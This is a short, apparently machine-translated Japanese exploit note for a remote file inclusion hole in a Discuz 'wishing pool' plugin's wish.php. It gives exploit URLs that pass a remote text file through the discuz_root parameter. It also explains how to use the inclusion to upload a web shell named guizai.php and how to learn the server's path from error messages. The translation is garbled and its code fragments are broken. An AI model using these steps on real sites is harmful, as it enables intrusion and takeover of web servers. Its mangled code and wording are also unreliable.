discuz願をかける池のプラグインの遠隔は穴を含みます。

願をかけるプールのプラグインのwish.phpファイルの出す問題：require $discuzroot.'/include/discuzcode.func.php';手動利用方法：遠隔には脆弱性、変数discuz_が含まれています。rootフィルタリングが厳しくないので、利用方法：http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 必ずtxtの後でつなぎ合わせる必要はなくて、任意の接尾語に変えることができて、後はきっと疑問符をプラスすることを覚えています。ここxxxxx.txtはCN.Tinkのその馬でshellを書いて入ります。copy（$u）FILES[MyFile][tmp_]name)，「\Inetpb\vhosts\baidu.com\bs\guizai.php」フォームm ENCTYPE=「multiipad/form-data」 ACTION=「」 METHOD="POST"ウェブサイトの物理的経路は提出によって可能です。http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ，エラーメッセージを見て、xxxxx.txtのパスを修正すればいいです。 guizai.phpはあなたがアップロードしたshellの名前です。